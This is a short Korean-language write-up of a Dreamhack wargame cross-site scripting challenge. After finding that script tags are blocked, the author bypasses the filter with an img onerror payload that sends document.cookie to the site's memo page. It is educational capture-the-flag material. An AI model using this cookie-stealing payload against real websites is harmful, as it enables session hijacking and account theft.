https://dreamhack.io/wargame/challenges/268
vuln(xss) page
memo
flag
vuln(xss) page는 alert가 실행되지 않는 것을 알 수 있다.
그래서 다른 태그는 잘 실행 되는지 보기위해서 img태그로 확인해본다.
잘 실행되는 것을 알 수 있다.
그럼 script 태그를 쓰지 않고 onerror를 이용해볼 것이다.
<img src="xss" onerror="location.href='/memo?memo='+document.cookie">
前) SWLUG 27기